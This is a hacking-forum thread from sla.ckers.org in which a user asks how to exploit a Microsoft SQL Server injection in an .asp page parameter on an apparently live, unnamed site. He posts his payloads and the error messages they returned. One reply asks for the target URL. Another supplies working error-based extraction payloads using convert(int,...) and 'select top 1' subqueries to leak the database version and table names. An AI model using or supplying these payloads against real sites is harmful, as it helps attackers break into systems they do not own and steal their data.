Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
[MsSQl Injection] Only select works and how to create an error.
Posted by: netpumber
Date: January 05, 2013 10:01AM

Hi.

I found this vuln and i m trying to exploit it two days now. It a little curious how it seems that it works.

with a single quote :

.asp?id=8'

RETURNED :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ''.

But if you try to use group by or something like or 1=1 / and 1=1

.asp?id=8 having 1=1--
.asp?id=8 or 1=1--

RETURNED:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'having'.

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'or'.

After that i tried to see which sql command will not return error.
I ve just put select *

.asp?id=8 select *--

and RETURNED:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Must specify table to select from.

Hmm a different error from the others. So i said to try retrieve some table names from information_schema and i execute

.asp?id=8 select table_name from information_schema.tables--

but RETURNED no ERROR and page laded correctly.

I thought that my query was executed without an error and that's why it happened.
Let's create an error

.asp?id=8+convert(int,(select table_name from information_schema.tables))--

RETURNED:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'convert'.

So this is my story.
Does anyone have an idea on how to make it print out the error ?
Any hint is welcomed!

Options: ReplyQuote
Re: [MsSQl Injection] Only select works and how to create an error.
Posted by: hack2012
Date: January 05, 2013 07:46PM

whereis url?

Options: ReplyQuote
Re: [MsSQl Injection] Only select works and how to create an error.
Posted by: Reiners
Date: March 07, 2013 03:21PM

netpumber Wrote:
-------------------------------------------------------
> I thought that my query was executed without an
> error and that's why it happened.
> Let's create an error
>
> .asp?id=8+convert(int,(select table_name from
> information_schema.tables))--
>
> RETURNED:
>
> Microsoft OLE DB Provider for SQL Server error
> '80040e14'
> Incorrect syntax near the keyword 'convert'.
>
> So this is my story.
> Does anyone have an idea on how to make it print
> out the error ?
> Any hint is welcomed!

extracting data through the error message as a side channel is the right way to go. the plus is urlencoded, so use %2b or a minus to get this to work.

.asp?id=8-convert(int,version())--

if you are using subselects, make sure they return only one row

.asp?id=8-convert(int,(select top 1 table_name from information_schema.tables))--

Options: ReplyQuote


Sorry, only registered users may post in this forum.